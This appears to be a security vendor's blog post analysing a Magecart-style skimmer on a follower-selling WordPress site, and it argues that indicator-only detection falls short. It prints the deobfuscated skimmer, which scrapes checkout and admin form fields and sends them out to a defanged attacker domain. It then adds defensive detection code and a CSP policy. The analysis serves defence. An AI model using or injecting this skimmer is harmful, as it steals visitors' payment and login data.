We recently identified a Magecart-style skimming attack still active on the WordPress site intertwitter[.]com, a suspicious platform offering Twitter (X) follower packages. While this is dubious as is (buying X followers is against the TOS), more concerning is the reuse of old infrastructure and how long this attack has remained undetected in the wild.
The live URLScan.io
Originally reported: Sansec, February 2024
Sansec confirms that malicious infrastructure often remains active for extended periods, sometimes even two years. Relying on the Internet police to take down rogue servers is therefore not a reliable defense strategy.
Willem de Groot - Sansec
The problem with IOC-only detection
Most security programs today still rely heavily on Indicators of Compromise (IOCs): known malicious domains, IPs, and hashes, used as the first (and often only) line of defense. While useful, this approach fails to detect threats that evolve slowly, reuse infrastructure, or operate in narrow, high-value contexts like client-side web skimming.
In this case:
- The malicious domain safecontentdelivery[.]com was flagged over a year ago.
- The same IOC was reused across multiple skimming campaigns.
- Despite being public for months, it remains active, suggesting no automated enforcement or widespread detection.
Just because an IOC is known doesn’t mean it’s being blocked.
Attackers count on this. They recycle infrastructure, hide in less popular or sketchy websites, and bide their time until the detection window closes. After all, why reinvent the wheel?
We’ve seen this domain appear in multiple Magecart campaigns over the past year. Its longevity shows that list-based defenses are easy to outlive.
How client-side attacks hide in plain sight
Client-side attacks are notoriously difficult to detect, not because their payloads are sophisticated, but because they execute outside the visibility perimeter of traditional security tools.
Here’s why:
- No server-side compromise required: A single injected script (via a plugin, third-party library, or stored XSS) is enough.
- Executed only in the victim’s browser: Server logs, WAFs, and backend systems never see the malicious behavior.
- Obfuscation & evasion: These scripts use tricks like DevTools detection, overridden browser functions, and CORS-evading exfiltration to avoid analysis.
- Stealth activation logic: The script only activates on checkout or admin paths, reducing exposure and avoiding attention.
Attack logic
- Trigger Condition: Activated only on URLs with /checkout or /admin.
- Targets: All form fields: <input>, <select>, <textarea>.
- Exfiltrates via: new Image().src, a plain GET request that is not subject to CORS restrictions.
- Destination: hxxps://csp[.]safecontentdelivery[.]com/app/panel/app.php.
- Anti-Analysis: Obfuscation, JSON tampering, and browser inspection detection.
Deobfuscated payload:
```javascript
// Runs only on pages whose URL contains "checkout" or "admin" (case-insensitive).
if (/checkout|admin/i.test(location.href)) {
  // Collect every form control on the page.
  const fields = document.querySelectorAll("input, select, textarea");
  const data = {};
  fields.forEach(field => {
    const name = field.name || field.id;
    // For <select>, take the visible option text rather than the option value.
    const value = field.tagName === "SELECT"
      ? field.options[field.selectedIndex].text
      : field.value;
    if (name && value) data[name] = value;
  });
  // Base64-encode the scraped fields and the page URL into the query string
  // (the destination is defanged here).
  const exfilUrl = `hxxps://csp[.]safecontentdelivery[.]com/app/panel/app.php?rnd=${Math.random() * 1e7}&data=${btoa(JSON.stringify(data))}&loc=${btoa(location.href)}`;
  // An image request is a simple GET: no CORS preflight, no XHR/fetch to monitor,
  // and the response is never read.
  new Image().src = exfilUrl;
}
```
How to secure your business
Relying on IOCs alone is reactive. To defend against modern threats, especially on the client side, you need:
- Behavioral analysis: Detect patterns like credential/form scraping, suspicious script injection, and dynamic DOM changes.
- Runtime JavaScript monitoring: Use tools that analyze how scripts behave in real-time in the browser.
- Supply chain hygiene: Minimize third-party dependencies and use subresource integrity (SRI) where possible.
- Content Security Policies (CSP): Restrict what scripts can run and where they can send data.
- Regular browser-based scanning: Use tools like urlscan.io, headless Chrome scripts, or commercial web threat monitors to analyze what users actually experience.
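The following is an added example, not c/side's code and not part of the campaign analysed above. It shows what behavioral detection of the image-beacon pattern looks like in practice: a URL classifier that flags a request for carrying base64-wrapped form data or a page URL to an origin outside a first-party allowlist, a browser-side hook on the <img>.src setter that reports and drops such beacons at runtime, and the CSP header that enforces the same boundary on the server side. The origins, the collector hostname and the sample beacon are constructed placeholders; the classifier runs in Node and the hook only installs when a browser DOM is present.

```javascript
// Added example (not c/side's or the skimmer's code). All origins are constructed.

const ALLOWED_ORIGINS = new Set([
  "https://shop.example",       // constructed: the site's own origin
  "https://cdn.shop.example",   // constructed: its first-party CDN
]);

// Base64 helpers that work in Node and in the browser and never throw.
function toBase64(s) {
  return typeof btoa === "function" ? btoa(s) : Buffer.from(s, "binary").toString("base64");
}
function tryBase64Decode(value) {
  try {
    // An unencoded '+' in a query string arrives as a space; restore it first.
    const v = value.replace(/ /g, "+");
    return typeof atob === "function" ? atob(v) : Buffer.from(v, "base64").toString("binary");
  } catch (_) {
    return null;
  }
}

// Classify an outbound image URL by behaviour rather than by domain list.
// Returns { suspicious, reasons } so a monitor can log, alert or block.
function classifyBeacon(urlString, allowedOrigins = ALLOWED_ORIGINS) {
  const reasons = [];
  let url;
  try {
    url = new URL(urlString);
  } catch (_) {
    return { suspicious: false, reasons: ["unparseable-url"] };
  }
  if (!allowedOrigins.has(url.origin)) reasons.push("external-origin");

  for (const [key, raw] of url.searchParams) {
    const decoded = tryBase64Decode(raw);
    if (decoded === null) continue;
    // Base64-wrapped JSON object: the shape of serialised form fields.
    try {
      const parsed = JSON.parse(decoded);
      if (parsed && typeof parsed === "object" && !Array.isArray(parsed)) {
        reasons.push(`base64-json:${key}`);
        continue;
      }
    } catch (_) { /* not JSON */ }
    // Base64-wrapped page URL: the shape of a "loc" parameter.
    if (/^https?:\/\//i.test(decoded)) reasons.push(`base64-url:${key}`);
  }

  // Verdict: data-bearing parameters leaving the allowlist is the form-scraping
  // signature, whichever domain happens to receive them.
  const carriesData = reasons.some((r) => r.startsWith("base64-"));
  return { suspicious: reasons.includes("external-origin") && carriesData, reasons };
}

// Browser-only runtime guard: intercept writes to <img>.src so a suspicious
// beacon is reported and dropped before the request fires. Returns false in Node.
function installImageSrcGuard(onSuspicious, allowedOrigins = ALLOWED_ORIGINS) {
  if (typeof HTMLImageElement === "undefined") return false;
  const desc = Object.getOwnPropertyDescriptor(HTMLImageElement.prototype, "src");
  Object.defineProperty(HTMLImageElement.prototype, "src", {
    configurable: true,
    enumerable: desc.enumerable,
    get() { return desc.get.call(this); },
    set(value) {
      const verdict = classifyBeacon(new URL(String(value), location.href).href, allowedOrigins);
      if (verdict.suspicious) { onSuspicious(String(value), verdict); return; }
      desc.set.call(this, value);
    },
  });
  return true;
}

// Enforcement layer to pair with the guard: a Content-Security-Policy header value
// that confines script, image, fetch/XHR and form destinations to first party.
const RECOMMENDED_CSP = [
  "default-src 'self'",
  "script-src 'self' https://cdn.shop.example",
  "img-src 'self' https://cdn.shop.example",
  "connect-src 'self'",
  "form-action 'self'",
].join("; ");

// Constructed sample mirroring the request shape described above (fake data, fake host).
const SAMPLE_BEACON =
  "https://collector.invalid/app/panel/app.php?rnd=1234567.89" +
  "&data=" + encodeURIComponent(toBase64(JSON.stringify({ card_number: "4111111111111111", cvv: "123" }))) +
  "&loc=" + encodeURIComponent(toBase64("https://shop.example/checkout"));

console.log(classifyBeacon(SAMPLE_BEACON));
console.log(RECOMMENDED_CSP);
```

The classifier flags the sample beacon on both signals (external origin plus base64-wrapped JSON and URL parameters) while a first-party image or a third-party tracking pixel without data-bearing parameters is left alone. The src hook is one behavioral signal, not a sandbox: a script can set the attribute through setAttribute, use fetch, or detect the overridden setter, which is why the CSP header is the layer that actually enforces where image and connect requests may go.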
For all of the above you can count on c/side.